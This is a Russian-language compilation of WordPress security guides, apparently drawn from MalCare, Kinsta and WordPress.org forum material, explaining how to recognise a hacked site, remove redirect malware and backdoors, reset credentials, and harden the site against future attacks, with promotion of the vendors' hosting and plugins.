После того, как вы успешно установили плагин, он автоматически начинает сканирование вашего веб-сайта на наличие вредоносного ПО Redirect. Это займет несколько минут, по истечении которых вы увидите экран, подобный приведенному ниже.

 

 

Вы можете просмотреть общее количество зараженных файлов, найденных в вашей установке и базе данных WP. Следующим шагом является нажатие кнопки «Автоматическая очистка», которая сканирует каждую строку вашей установки и базы данных, чтобы удалить вредоносный код из затронутых файлов. 

На этом этапе вы устранили текущую инфекцию с вашего сайта.

Но, как и во всем, что касается безопасности, лучше перестраховаться, чем сожалеть; следующий взлом всегда не за горами.

Лучший способ — защитить свой сайт от будущих атак хакеров. WordPress рекомендует набор рекомендуемых экспертами мер по усилению безопасности WordPress, которые ограничивают как способы доступа хакеров к вашему сайту, так и ущерб, который они могут нанести, если им удастся взломать. 

Вы можете использовать MalCare чтобы включить эти функции, которые в противном случае требуют немало технических знаний и ноу-хау WordPress. Сделать это можно через панель инструментов — в несколько кликов. 

 

 

Использование ручного метода

Прежде чем начать, вы должны знать, что этот метод требует значительных затрат времени и усилий. Вы также должны иметь необходимые знания в установочных файлах WP и таблицах базы данных, чтобы выполнить это самостоятельно. 

Совет: сделайте резервную копию файлов вашего веб-сайта и таблиц базы данных, чтобы вам было на что опереться в случае возникновения проблем.

Вы можете сделать это вручную или установить плагин резервного копирования, например BlogVault который автоматизирует и сокращает этот процесс. Это гарантирует, что вы сделаете резервную копию всех элементов вашего сайта и сможете легко автоматизировать процесс восстановления вашего сайта, когда вам это нужно. 

Вот шаги, чтобы вручную очистить ваш сайт:  

1. Проверьте и очистите ядро ​​WordPress: Используя cPanel в своей учетной записи хоста или любой инструмент FTP, загрузите папку установки WP.

  • Затем загрузите свежую и чистую копию версии WordPress, которую в настоящее время использует ваш сайт, с WordPress.org.
  • Используйте Diffchecker чтобы сравнить все основные файлы и папки установки вашего веб-сайта со свежезагруженной версией. Удалите модификации (изменения кода или добавления файлов) в вашей установочной копии.
  • Используя cPanel или FTP, загрузите очищенную версию WP в свою учетную запись хостинга.

2. Проверьте и очистите свои плагины и темы: Следующим шагом будет проверка наличия вредоносного ПО перенаправления на вашем плагины и темы. 

Этот процесс аналогичен процессу для основных файлов WordPress — как обсуждалось выше — путем сравнения файлов плагинов в вашей установке с исходной версией.

Как видите, оба эти шага повторяются и требуют много времени, учитывая, что вам нужно просмотреть каждый файл, чтобы проверить наличие изменений. 

3. Проверьте и очистите базу данных: Затем вам нужно сканировать любые вредоносные программы перенаправления в таблицах вашей базы данных. Хакеры также могут вставлять ключевые слова спама, такие как eval, base64_decode или into your database.

Как и в шаге 2, вам нужно просканировать каждую таблицу базы данных с помощью любого инструмента управления базой данных, такого как phpMyAdmin.

4. Удалите бэкдоры: Следующим шагом будет сканирование любых бэкдоров в папке установки.

Бэкдоры — это точки входа, которые хакеры оставляют, чтобы восстановить доступ к вашему сайту. Для этого шага найдите на своем сайте вредоносные функции PHP, такие как eval, base64_decode, preg_replace, где хакеры обычно оставляют лазейки.

Однако это может быть сложно — для выявления этих вредоносных функций нужен опытный глаз, а непреднамеренное удаление функций может привести к сбою или сбою вашего сайта.  

5. Удалите неопознанные учетные записи: Последний шаг — найти и удалить любую неопознанную учетную запись администратора, которую могли добавить хакеры. 

Вы можете сделать это на панели WordPress > Пользователи, где перечислены все ваши текущие пользователи. После удаления неавторизованных учетных записей пользователей обязательно сбросьте все пароли пользователей и измените ключи безопасности.

Заключение

Мы надеемся, что эта статья помогла вам лучше понять Redirect Hack и предоставила вам знания и инструменты для защиты вашего веб-сайта от него.

Этот хак является одним из самых распространенных и в то же время самых разрушительных хаков. 

Вы также должны прочитать некоторые из наших популярных статей о безопасности WordPress:

  • Лучшие плагины безопасности WordPress
  • Как оптимизировать базу данных WordPress 
  • Сделайте это, когда Wp-admin перенаправляет на ошибку 404

Предпринимались ли какие-либо другие шаги для решения этой проблемы? Любые другие решения, которые вы рекомендуете? Мы хотели бы услышать от вас. Дайте нам знать в комментариях ниже. 

Что делать, если ваш сайт в беде

Сайт WordPress взломан. Если это случится с вами, есть искушение запаниковать. В этом посте я помогу вам определить, был ли ваш сайт взломан, проведу шаги по его очистке и помогу сделать его более безопасным.

Наконец, я дам вам несколько советов, как предотвратить повторный взлом вашего сайта WordPress в будущем.

Готов? Сделайте глубокий вдох, и давайте начнем.

Ваш сайт WordPress работает не так, как должен. Но как узнать, что проблема связана со взломом? Давайте рассмотрим некоторые признаки того, что ваш сайт был взломан:

  • Вы не можете войти.
  • Ваш сайт изменился без вашего участия (например, домашняя страница была заменена статической страницей или был добавлен новый контент).
  • Ваш сайт перенаправляет на другой сайт.
  • Когда вы или другие пользователи пытаетесь получить доступ к вашему сайту, вы получаете предупреждение в своем браузере.
  • Когда вы ищете свой сайт, Google выдает предупреждение о том, что он мог быть взломан.
  • Вы получили уведомление от подключаемого модуля безопасности о взломе или неожиданном изменении.
  • Ваш хостинг-провайдер предупредил вас о необычной активности в вашей учетной записи.

Давайте рассмотрим каждый из них более подробно.

Вы не можете войти в систему

Если вы не можете войти на свой сайт, это может быть признаком того, что ваш сайт был взломан. Однако более вероятно, что вы просто забыли свой пароль. Поэтому, прежде чем предположить, что вас взломали, попробуйте сбросить пароль. Если вы не можете, это тревожный знак. Даже если вы можете, вас все равно могут взломать, и вам придется провести еще немного расследования.

Хакеры иногда удаляют пользователей или меняют пароли пользователей, чтобы предотвратить доступ. Если вы не можете сбросить пароль, ваша учетная запись могла быть удалена, что является признаком взлома.

Ваш сайт изменился

Одной из форм взлома является замена домашней страницы статической страницей. Если ваш сайт выглядит совершенно по-другому и не использует вашу тему, вероятно, он был взломан.

Изменения могут быть более тонкими, например, добавление ложного контента или ссылок на сомнительные сайты. Если ваш нижний колонтитул полон ссылок, которые вы не добавляли, и особенно если эти ссылки скрыты или имеют крошечный размер шрифта, вас могли взломать.

Прежде чем предположить, что вас взломали, уточните у других администраторов или редакторов сайта, не внесли ли они изменения случайно.

Если ваша тема не из надежного источника и вы недавно обновили ее, это может быть причиной.

Ваш сайт перенаправляет

Иногда хакеры добавляют скрипт, который перенаправляет людей на другой сайт, когда они посещают ваш. Вероятно, это будет сайт, на который вы не хотите, чтобы перенаправляли ваших пользователей.

Это случилось со мной, когда управляемый мной школьный сайт перенаправлял на сайт знакомств. Как вы можете себе представить, мой клиент был недоволен, и ему пришлось бросить все, что я делал, и немедленно все исправить. Оказалось, что это была небезопасность на сервере, а не на моем сайте, что является одной из причин использовать только качественный хостинг. Я сменил хостинг-провайдера как можно скорее и почти сразу же исправил взлом.

Предупреждения браузера

Если ваш браузер предупреждает, что ваш сайт взломан, это может быть признаком того, что ваш сайт был взломан. Это также может быть связано с некоторым кодом в теме или плагине, который необходимо удалить, или проблемой с доменами или SSL.

Обратитесь к совету, данному вместе с предупреждением в вашем браузере, чтобы помочь вам диагностировать проблему.

Предупреждения поисковой системы

При поиске вашего сайта, если он был взломан, Google может отображать предупреждение. Это может означать, что карта сайта была взломана, что повлияет на то, как Google сканирует ваш сайт. Или это может быть более серьезной проблемой: вам нужно будет провести диагностику ниже, чтобы точно узнать, что произошло.

Оповещение Google — этот сайт мог быть взломан

Почему сайты WordPress подвергаются взлому

Существует множество причин взлома сайтов WordPress, но вот обзор наиболее распространенных факторов .

1. Небезопасные пароли

Это одна из наиболее частых причин взлома. Самый часто используемый пароль в мире — «password». Безопасные пароли необходимы не только для вашей учетной записи администратора WordPress, но и для всех ваших пользователей и всех аспектов вашего сайта, включая FTP и хостинг.

2. Устаревшее программное обеспечение

Плагины и темы, а также сам WordPress подлежат обновлениям безопасности, которые необходимо установить на ваш сайт. Если вы не обновляете свои темы, плагины и версию WordPress, вы делаете свой сайт уязвимым.

3. Небезопасный код

Плагины и темы, полученные из ненадежных источников, могут создавать уязвимости на вашем сайте. Если вам нужны бесплатные темы или плагины WordPress, установите их из официального каталога тем.

При покупке премиальных тем и плагинов обязательно проверяйте репутацию поставщика и получайте рекомендации от людей и источников, которым вы доверяете. Никогда не устанавливайте плагины с нулевым значением, которые являются премиальными плагинами с бесплатных сайтов, предназначенными для причинения вреда или сбора информации.

Как взламывают WordPress?

Если вы хотите узнать больше о том, как взламываются сайты WordPress (и не торопитесь с действиями, которые нужно предпринять, если ваш собственный сайт был взломан), вот основные пути, по которым хакеры могут проникнуть на ваш сайт:

  • Бэкдоры — они обходят обычные методы доступа к вашему сайту, например. через скрипты или скрытые файлы. Примером может служить уязвимость Tim Thumb в 2013 году.
  • Pharma hacks — эксплойт, используемый для вставки мошеннического кода в устаревшие версии WordPress.
  • Попытки входа в систему методом перебора — когда хакеры используют автоматизацию для использования слабых паролей и получения доступа к вашему сайту.
  • Вредоносные перенаправления — когда бэкдоры используются для добавления вредоносных перенаправлений на ваш сайт.
  • Межсайтовый скриптинг (XSS) — наиболее распространенная уязвимость, встречающаяся в плагинах WordPress, это скрипты внедрения, которые затем позволяют хакеру отправить вредоносный код в браузер пользователя.
  • Отказ в обслуживании (DoS) — когда ошибки или ошибки в коде веб-сайта используются для перегрузки веб-сайта, поэтому он больше не работает.

Если вы используете сайт электронной коммерции, обязательно прочитайте наше подробное руководство по предотвращению мошенничества в электронной торговле.

Все это звучит довольно пугающе, но есть шаги, которые вы можете предпринять, чтобы защитить свой сайт WordPress от них. Во-первых, давайте рассмотрим шаги, которые необходимо предпринять, когда ваш сайт взломан.

Сайт WordPress взломан: что делать (пошаговое руководство)

Если ваш сайт размещен на Kinsta, у нас есть гарантия отсутствия взлома, что означает, что мы проработаем ваш сайт и удалим взлом. Если вы работаете с другим хостинг-провайдером, вам нужно будет привлечь его, но, возможно, вам придется многое сделать самостоятельно.

Гарантия Kinsta на отсутствие взлома

Шаги, которые вам необходимо предпринять, будут зависеть от того, каким образом ваш сайт был взломан, и вам может не понадобиться прорабатывать все это. Шаги, которые мы пройдем:

  1. Не паникуйте
  2. Переведите свой сайт в режим обслуживания
  3. Сброс паролей
  4. Используйте службу удаления вредоносных программ Kinsta
  5. Обновление плагинов и тем
  6. Удалить пользователей
  7. Удалить ненужные файлы
  8. Очистить карту сайта
  9. Переустановите плагины и темы
  10. Переустановите ядро ​​WordPress
  11. Очистить базу данных

Шаг 1.

Не паникуйте

Я знаю, что самое худшее, что вы можете сказать тому, кто паникует, это «не паникуй». Но у вас должна быть ясная голова, если вы хотите диагностировать и решить проблему.

Если вы не можете ясно мыслить, просто переведите свой сайт в режим обслуживания и оставьте его на несколько часов, пока не почувствуете себя спокойнее. Что, опять же, звучит легче сказать, чем сделать, но здесь это имеет решающее значение.

Шаг 2. Переведите свой сайт в режим обслуживания

Вы не хотите, чтобы посетители обнаружили ваш сайт в скомпрометированном состоянии, и вы также не хотите, чтобы они видели, как ваш сайт будет выглядеть, пока вы его исправляете.

Так что переведите его в режим обслуживания, если можете.

Если вы не можете войти на свой сайт WordPress прямо сейчас, это будет невозможно, но как только вы сможете, вернитесь и сделайте это.

Плагин, такой как Coming Soon Page & Maintenance Mode, позволит вам перевести ваш сайт в режим обслуживания, создав впечатление, что он проходит плановое обслуживание, а не исправляется после взлома.

Скоро появится плагин Page & Maintenance Mode

После того, как вы это сделаете, вы можете немного расслабиться, зная, что люди не могут видеть, что происходит.

Вы можете настроить плагин так, чтобы он добавлял логотип и настраивал цвета, или вы можете просто ввести какой-нибудь быстрый пояснительный текст и остановиться на этом.

Теперь вы можете видеть свой неработающий сайт, а другие люди — нет.

Шаг 3. Воспользуйтесь службой удаления вредоносных программ Kinsta

Чтобы избавить себя от необходимости выполнения всех описанных ниже действий, вы можете приобрести услугу удаления вредоносных программ Kinsta за единовременную плату в размере 100 долларов США при переходе на Kinsta. Важно: если вы являетесь клиентом Kinsta, это включено в ваш план!

Если вы не хотите этого делать или не можете себе это позволить, читайте дальше, чтобы узнать больше о том, как очистить взломанный сайт.

Шаг 4. Сброс паролей

Поскольку вы не знаете, какой пароль использовался для доступа к вашему сайту, важно изменить их все, чтобы хакер не смог их снова использовать. Это не ограничивается вашим паролем WordPress: сбросьте пароль SFTP, пароль базы данных и пароль вашего хостинг-провайдера.

Вам необходимо убедиться, что другие пользователи-администраторы также сбрасывают свои пароли.

Шаг 5: Обновите плагины и темы

Следующим шагом будет убедиться, что все ваши плагины и темы обновлены. Перейти к Dashboard > Обновите на своем сайте и обновите все, что устарело.

Вы должны сделать это до того, как попытаетесь исправить что-либо еще, поскольку, если подключаемый модуль или тема делают ваш сайт уязвимым, все последующие исправления могут быть отменены из-за этой уязвимости. Поэтому убедитесь, что все обновлено, прежде чем продолжить.

Шаг 6: Удаление пользователей

Если на ваш сайт WordPress были добавлены какие-либо учетные записи администратора, которые вы не узнаете, пора их удалить. Перед тем, как это сделать, проверьте у любых авторизованных администраторов, не изменились ли они данные своей учетной записи и вы их просто не узнаете.

Перейдите на экран Users в панели администратора WordPress и щелкните ссылку Administrator над списком пользователей. Если там есть пользователи, которых не должно быть, установите флажок рядом с ними, затем выберите Удалить в раскрывающемся списке Массовые действия . Шаг 7. Удаление ненужных файлов какие-либо файлы, которых там быть не должно, или использовать службу безопасности, такую ​​как Sucuri.

Шаг 8. Очистите карту сайта и повторно отправьте ее в Google

Одной из причин того, что сайт помечен поисковыми системами, может быть взлом файла sitemap.xml. В одном случае, который мы зафиксировали в Kinsta, карта сайта была заражена фиктивными ссылками и иностранными символами.

Вы можете восстановить свою карту сайта с помощью плагина SEO, но вам также нужно будет сообщить Google, что сайт был очищен. Добавьте свой сайт в Google Search Console и отправьте отчет о картах сайта в Google, чтобы сообщить им, что вам нужно просканировать сайт. Это не гарантирует, что ваш сайт будет просканирован немедленно и может занять до двух недель. Вы ничего не можете сделать, чтобы ускорить это, поэтому вам придется набраться терпения.

Шаг 9. Переустановите плагины и темы

Если на вашем сайте по-прежнему возникают проблемы, вам необходимо переустановить все плагины и темы, которые вы еще не обновили. Деактивируйте и удалите их со страниц Темы (вот как безопасно удалить тему WordPress) и Плагины  , а затем переустановите их. Если вы еще не перевели свой сайт в режим обслуживания, сделайте это в первую очередь!

Если вы купили плагин или тему у поставщика плагинов или тем и не уверены, насколько они безопасны, самое время подумать, стоит ли вам продолжать их использовать. Если вы загрузили бесплатную тему/плагин из любого места, кроме каталогов плагинов или тем WordPress, не переустанавливайте . Вместо этого установите его из каталога тем или плагинов или купите законную версию. Если вы не можете себе это позволить, замените его бесплатной темой/плагином из каталога тем или плагинов, который выполняет ту же или аналогичную работу.

Если это не решит проблему, проверьте страницы поддержки для всех ваших тем и плагинов. Возможно, у других пользователей возникают проблемы, и в этом случае вам следует удалить эту тему или плагин, пока уязвимость не будет устранена.

Шаг 10: Переустановите WordPress Core

Если ничего не помогает, вам нужно переустановить сам WordPress. Если файлы в ядре WordPress были скомпрометированы, вам необходимо заменить их чистой установкой WordPress.

Загрузите чистый набор файлов WordPress на свой сайт через SFTP, убедившись, что вы перезаписали старые. Рекомендуется сначала сделать резервную копию ваших файлов wp-config.php и .htaccess на случай, если они будут перезаписаны (хотя этого не должно быть).

Если вы использовали автоустановщик для установки WordPress, не используйте его снова, так как он перезапишет вашу базу данных и вы потеряете свой контент. Вместо этого используйте SFTP только для загрузки файлов. Если вы находитесь на Kinsta и использовали наш установщик WordPress, вам все равно не нужно беспокоиться об этом шаге, поскольку мы заменим для вас ядро ​​​​WordPress в рамках нашей службы исправления взлома.

Шаг 11. Очистите вашу базу данных

Если ваша база данных была взломана, вам также необходимо очистить ее. Рекомендуется очистить вашу базу данных, так как чистая база данных будет содержать меньше устаревших данных и занимать меньше места, что сделает ваш сайт быстрее.

Как узнать, взломали ли вашу базу данных? Если вы используете подключаемый модуль или службу безопасности, запустив сканирование через него, вы узнаете, была ли взломана база данных (или, возможно, вам было отправлено предупреждение). Кроме того, вы можете использовать плагин, такой как NinjaScanner, который будет сканировать вашу базу данных.

Плагин WP-Optimize позволит вам очистить вашу базу данных и оптимизировать ее на будущее.

Как предотвратить взлом вашего сайта WordPress

Итак, вы очистили свой сайт и сбросили пароли, чтобы он стал немного более безопасным, чем раньше.

Но вы можете сделать больше, чтобы предотвратить будущие взломы и избежать повторения того же самого.

1. Убедитесь, что все пароли безопасны

Если вы еще этого не сделали, убедитесь, что все пароли, относящиеся к вашему веб-сайту, а не только пароль администратора WordPress, сброшены, и что вы используете надежные пароли.

Плагин безопасности позволит вам заставить пользователей использовать безопасные пароли, или, если вы используете Kinsta, он встроен в ваш план хостинга.

Вы также можете добавить на свой сайт двухфакторную аутентификацию, чтобы хакерам было сложнее создать учетную запись.

2. Обновляйте свой сайт

Важно поддерживать ваш сайт в актуальном состоянии. Каждый раз, когда ваша тема, плагины или сам WordPress обновляются, вы должны запускать это обновление, так как оно часто включает исправления безопасности.

Вы можете включить автоматическое обновление, отредактировав файл wp-config.php или установив плагин, который сделает это за вас. Если вы не хотите этого делать, потому что хотите сначала протестировать обновления, плагин безопасности уведомит вас, когда вам нужно запустить обновление.

Когда вы обновляете свой сайт, убедитесь, что вы делаете это правильно, создавая резервную копию и тестируя обновления на промежуточном сервере, если он у вас есть. Планы Kinsta включают автоматическое резервное копирование и промежуточную среду для всех сайтов.

3. Не устанавливайте небезопасные плагины или темы

При установке плагинов WordPress в будущем убедитесь, что они были протестированы с вашей версией WordPress и что вы загружаете их из надежного источника.

Всегда устанавливайте бесплатные плагины и темы через каталоги тем и плагинов: не поддавайтесь искушению получить их со сторонних сайтов. Если вы покупаете премиальные темы или плагины, проверьте репутацию поставщика плагинов и попросите рекомендации.

4. Очистите установку WordPress

Если у вас установлены темы или плагины, но они не активированы, удалите их. Если у вас есть какие-либо файлы или старые установки WordPress в вашей среде хостинга, которые вы не используете, пришло время удалить их. Удалите все базы данных, которые вы не используете.

Если на вашем сервере есть старые, неиспользуемые установки WordPress, они будут особенно уязвимы, так как вы вряд ли будете поддерживать их в актуальном состоянии.

5. Установите SSL на свой сайт

SSL добавит уровень безопасности вашему сайту и является бесплатным. Планы Kinsta включают SSL без дополнительной платы. Если ваш хостинг-провайдер не предоставляет бесплатный SSL, вы можете использовать плагин SSL Zen, чтобы добавить бесплатный Let’s Encrypt SSL.

6. Избегайте дешевого хостинга

Дешевый хостинг означает, что вы будете делить место на сервере с сотнями других клиентов. Это не только замедлит работу вашего сайта, но также повысит вероятность того, что один из этих других сайтов поставит сервер под угрозу.

Дешевые хостинг-провайдеры с меньшей вероятностью будут тщательно следить за безопасностью сервера или помогать вам, если ваш сайт взломан. Качественный хостинг-провайдер, такой как Kinsta, даст вам гарантию защиты от взлома и приложит все усилия для обеспечения безопасности вашего сайта.

7. Настройка брандмауэра

Плагин безопасности или служба, такая как Cloudflare или Sucuri, позволит вам настроить брандмауэр для вашего сайта. Это добавит дополнительный барьер для хакеров и уменьшит вероятность взлома и DDoS-атак на ваш сайт.

Здесь, в Kinsta, все сайты WordPress наших клиентов защищены корпоративным брандмауэром Google. Мы также предоставляем пользователям простой в использовании инструмент IP Deny в MyKinsta для блокировки вредоносных IP-адресов.

8. Установите подключаемый модуль безопасности

Если вы установите на свой сайт подключаемый модуль безопасности, он будет уведомлять вас о любых подозрительных действиях. Это может включать несанкционированный вход в систему или добавление файлов, которых там быть не должно.

Опять же, обратитесь к предупреждению плагина, чтобы выяснить, в чем проблема.

Напоминание: если ваш сайт размещен на Kinsta, вам не нужно устанавливать плагины безопасности. Это потому, что Kinsta предоставляет все необходимые функции безопасности.

9. Подумайте о службе безопасности

Если вы не являетесь пользователем Kinsta, вы можете рассмотреть возможность использования службы безопасности, такой как Sucuri, которая будет следить за вашим сайтом и исправлять его, если вас снова взломают.

Sucuri

Это не дешево, но если ваш веб-сайт важен для дохода вашего бизнеса, он может окупить себя. Существуют разные планы, предлагающие разное время выполнения исправлений безопасности. Sucuri будет следить за вашим сайтом, предупреждать вас о нарушениях безопасности и устранять их для вас. Это означает, что вам не нужно снова проходить процесс очистки вашего сайта самостоятельно.

В качестве альтернативы, планы хостинга Kinsta включают функции безопасности, включая обнаружение DDoS, мониторинг времени безотказной работы, аппаратные стены и гарантию отсутствия взлома, что означает, что если ваш сайт взломан, мы очистим его для вас. Если вы перейдете на Kinsta, мы бесплатно перенесем ваш сайт и очистим его, если он будет взломан в будущем. Обязательно ознакомьтесь с нашим тщательно подобранным списком лучших плагинов миграции WordPress.

OMG… Ваш сайт был взломан! 😭😱Что делать дальше, чтобы почистить? Вот все шаги, которые вы должны отметить в своем списке восстановления, чтобы ваш сайт был на 100% защищен от взлома ✅Нажмите, чтобы твитнуть

Резюме

Взлом вашего веб-сайта — неприятный опыт. Это означает, что ваш сайт недоступен для пользователей, что может повлиять на ваш бизнес. Это будет означать, что вы должны предпринять быстрые действия, которые повлияют на вашу другую деятельность.

Вот краткое изложение шагов, которые необходимо предпринять, если ваш сайт взломан:

  • Сбросить пароли.
  • Обновление плагинов и тем.
  • Удалить пользователей, которых там быть не должно.
  • Удалите ненужные файлы.
  • Очистите карту сайта.
  • Переустановите плагины и темы, а также ядро ​​WordPress.
  • При необходимости очистите базу данных.

И помните: выполнение описанных выше действий по предотвращению взломов избавит вас от необходимости делать все это снова в будущем: стоит обеспечить максимальную безопасность вашего сайта.


Экономьте время, затраты и повышайте производительность сайта с помощью:

  • Мгновенная помощь от экспертов по хостингу WordPress, круглосуточно и без выходных.
  • Интеграция с Cloudflare Enterprise.
  • Глобальный охват аудитории благодаря 34 центрам обработки данных по всему миру.
  • Оптимизация с помощью нашего встроенного мониторинга производительности приложений.

Все это и многое другое в одном плане без долгосрочных контрактов, сопровождаемой миграции и 30-дневной гарантии возврата денег. Ознакомьтесь с нашими планами или поговорите с отделом продаж, чтобы найти план, который подходит именно вам.

Часто задаваемые вопросы Мой сайт был взломан – Форумы WordPress.

org

Темы

  • Помогите Мне кажется, меня взломали
  • Несколько шагов
  • Другие ресурсы

Взлом может стать одним из самых неприятных переживаний в вашем онлайн-путешествии. Однако, как и в большинстве других вещей, прагматичный подход может помочь вам сохранить здравомыслие. При этом выходя за рамки проблем с минимальным воздействием.

Взлом — очень двусмысленный термин, который сам по себе мало что дает для понимания того, что именно произошло. Чтобы убедиться, что вы получите необходимую помощь через форумы, убедитесь, что понимаете конкретные симптомы, которые заставляют вас думать, что вас взломали. Они также известны как индикаторы компрометации (IoC).

Несколько IoC, которые являются явными индикаторами взлома, включают:

  • Веб-сайт занесен в черный список Google, Bing и т. д.
  • Хост отключил ваш веб-сайт их настольные антивирусы помечают ваш сайт
  • Сообщили, что ваш веб-сайт используется для атаки на другие сайты
  • Уведомление о несанкционированном поведении (например, создание новых пользователей и т. д.)
  • Вы можете увидеть, что ваш сайт был взломан, когда вы открываете его в браузере.

Не все взломы созданы одинаковыми, поэтому, участвуя в форумах, имейте это в виду. Если вы сможете лучше понять симптомы, команды будут лучше подготовлены для оказания помощи.

Ниже вы найдете ряд шагов, которые помогут вам начать работу после взлома. Они не охватывают все, так как было бы непрактично учитывать каждый сценарий, но они разработаны, чтобы помочь вам продумать процесс.

Наверх ↑

Сохраняйте спокойствие.

При решении проблемы безопасности как владелец веб-сайта вы, вероятно, испытываете чрезмерное напряжение. Часто это самое уязвимое место, которое вы обнаружили с тех пор, как оказались в сети, и это противоречит тому, что все говорили вам: «Эй, WordPress — это просто!»

Хорошая новость: еще не все потеряно! Да, вы можете потерять часть денег. Да, вы можете нанести удар по своему бренду. Да, вы поправитесь от этого.

Итак, да, сделайте шаг назад и успокойтесь. Это позволит вам более эффективно контролировать ситуацию и восстановить свое присутствие в Интернете.

Документ.

Первый шаг, который необходимо предпринять после компрометации, — документирование. Найдите минутку, чтобы задокументировать то, что вы испытываете, и, если возможно, время. Несколько вещей, которые вы должны иметь в виду:

  • Что вы видите, что заставляет вас поверить, что вас взломали?
  • Когда вы заметили эту проблему? Какой часовой пояс?
  • Какие действия вы недавно предприняли? Был ли установлен новый плагин? Вы изменили тему? Изменить виджет?

Вы создаете основу для того, что распознается как отчет об инциденте. Планируете ли вы самостоятельно реагировать на инциденты или привлечь профессиональную организацию, этот документ со временем станет бесценным.

Также рекомендуется уделить немного времени комментированию сведений о вашей хост-среде. Это потребуется на каком-то этапе процесса реагирования на инциденты.

Просканируйте свой веб-сайт.

При сканировании вашего веб-сайта у вас есть несколько различных способов сделать это, вы можете использовать внешние удаленные сканеры или сканеры уровня приложения. Каждый из них предназначен для просмотра и сообщения о разных вещах. Ни одно решение не является лучшим подходом, но вместе вы значительно повышаете свои шансы.

Сканеры на основе приложений (плагины):

  • Quttera
  • GOTMLS
  • WordFence
  • Sucuri

Сканеры на основе удаленных. плагины безопасности доступны в репозитории WP. Аннотированные выше существуют уже давно, и за каждым из них стоят сильные сообщества.

Просканируйте локальную среду.

В дополнение к сканированию вашего веб-сайта вы должны начать сканирование локальной среды. Во многих случаях источник атаки/заражения начинается с вашего локального компьютера (например, ноутбука, рабочего стола и т.  д.). Злоумышленники запускают трояны локально, которые позволяют им перехватывать информацию о доступе к таким вещам, как FTP и /wp-admin, которые позволяют им войти в систему как владелец сайта.

Убедитесь, что на локальном компьютере выполняется полная проверка на наличие вирусов и вредоносных программ. Некоторые вирусы хорошо обнаруживают антивирусное ПО и прячутся от него. Так что, может быть, попробовать другой. Этот совет распространяется на компьютеры с Windows, OS X и Linux.

Уточните у своего хостинг-провайдера.

Взлом мог затронуть не только ваш сайт, особенно если вы используете виртуальный хостинг. Стоит проконсультироваться с вашим хостинг-провайдером на случай, если они предпринимают какие-либо шаги или нуждаются в этом. Ваш хостинг-провайдер также может подтвердить, является ли взлом фактическим взломом или, например, потерей обслуживания.

Одним из очень серьезных последствий взлома в наши дни является занесение электронной почты в черный список. Это, кажется, происходит все больше и больше. Поскольку веб-сайты используются для рассылки СПАМ-писем, органы управления черным списком электронной почты помечают IP-адреса веб-сайтов, и эти IP-адреса часто связаны с тем же сервером, который используется для электронной почты. Лучшее, что вы можете сделать, это обратиться к поставщикам электронной почты, таким как Google Apps, когда дело доходит до потребностей вашего бизнеса.

Помните о черных списках веб-сайтов.

Проблемы с черным списком Google могут нанести ущерб вашему бренду. В настоящее время они заносят в черный список от 9 500 до 10 000 веб-сайтов в день. Это число растет ежедневно. Существуют различные формы предупреждений, от больших заставок, предупреждающих пользователей держаться подальше, до более тонких предупреждений, которые появляются на страницах результатов вашей поисковой системы (SERP).

Хотя Google является одним из наиболее известных, существует ряд других организаций, включенных в черный список, таких как Bing, Yahoo и широкий спектр настольных антивирусных приложений. Поймите, что ваши клиенты/посетители веб-сайта могут использовать любое количество инструментов, и любой из них может быть причиной проблемы.

Рекомендуется зарегистрировать свой сайт в различных онлайн-консолях для веб-мастеров, таких как:

  • Google Search Console
  • Bing Webmaster
  • Yandex Webmaster
  • Norton Webmaster

9006.3 Улучшите контроль доступа.

Вы часто слышите, как люди говорят об обновлении таких вещей, как пароли. Да, это очень важная часть, но это одна маленькая часть в гораздо большей проблеме. Нам нужно улучшить нашу общую позицию, когда дело доходит до контроля доступа. Это означает использование для начала сложных, длинных и уникальных паролей. Лучшая рекомендация — использовать генератор паролей, подобный тем, которые можно найти в таких приложениях, как 1Password и LastPass.

Помните, что это включает изменение всех точек доступа. Когда мы говорим о точках доступа, мы имеем в виду такие вещи, как FTP / SFTP, WP-ADMIN, CPANEL (или любую другую панель администратора, которую вы используете на своем хосте) и MYSQL.

Это также выходит за рамки вашего пользователя и должно включать всех пользователей, имеющих доступ к среде.

Также рекомендуется рассмотреть возможность использования какой-либо формы двухфакторной/многофакторной системы аутентификации. В самой простой форме он вводит и требует вторую форму аутентификации при входе в ваш экземпляр WordPress.

Некоторые из плагинов, доступных для помощи в этом, включают:

  • Rublon
  • Duo

Сбросить все права доступа.

Как только вы обнаружите взлом, одним из первых шагов, который вы захотите сделать, является блокировка вещей, чтобы вы могли свести к минимуму любые дополнительные изменения. Первое, с чего нужно начать, — это ваши пользователи. Вы можете сделать это, принудительно сбросив глобальный пароль для всех пользователей, особенно для администраторов.

Вот плагин, который может помочь с этим шагом:

  • iThemes Security

Вы также хотите удалить всех пользователей, которые могут активно входить в WordPress. Вы делаете это, обновляя секретные ключи в wp-config. Вам нужно будет создать здесь новый набор: генератор ключей WordPress. Возьмите эти значения, а затем перезапишите значения в вашем файле wp-config.php новыми. Это заставит любого, кто все еще может войти в систему, выйти из системы.

Создать резервную копию.

Надеюсь, у вас есть резервная копия вашего веб-сайта, но если ее нет, сейчас самое время ее создать. Резервные копии — это важная часть продолжения вашей работы, и вы должны активно планировать ее продвижение вперед. Вы также должны спросить своего хоста, какова их политика в отношении резервного копирования. Если у вас есть резервная копия, вы сможете выполнить восстановление и навыки прямо в судебно-медицинской экспертизе.

Примечание: важно регулярно делать резервные копии базы данных и файлов. Если это когда-нибудь повторится.

В любом случае, прежде чем перейти к следующему этапу очистки, рекомендуется сделать еще один снимок окружающей среды. Даже если он заражен, в зависимости от типа взлома, последствия могут вызвать множество проблем, и в случае катастрофического сбоя у вас будет хотя бы эта плохая копия, на которую можно ссылаться.

Найти и удалить взлом.

Это будет самая сложная часть всего процесса. Поиск и удаление взлома. Точные шаги, которые вы предпримете, будут зависеть от ряда факторов, включая, помимо прочего, симптомы, указанные выше. То, как вы подойдете к проблеме, будет определяться вашими техническими способностями при работе с веб-сайтами и веб-серверами.

Однако, чтобы помочь в этом процессе, мы включили ряд различных ресурсов, которые должны помочь вам в этом процессе:

  • Ваш сайт WordPress был взломан?
  • Как очистить взломанную установку
  • Как очистить взломанный сайт WordPress
  • Как справиться со взломанным сайтом
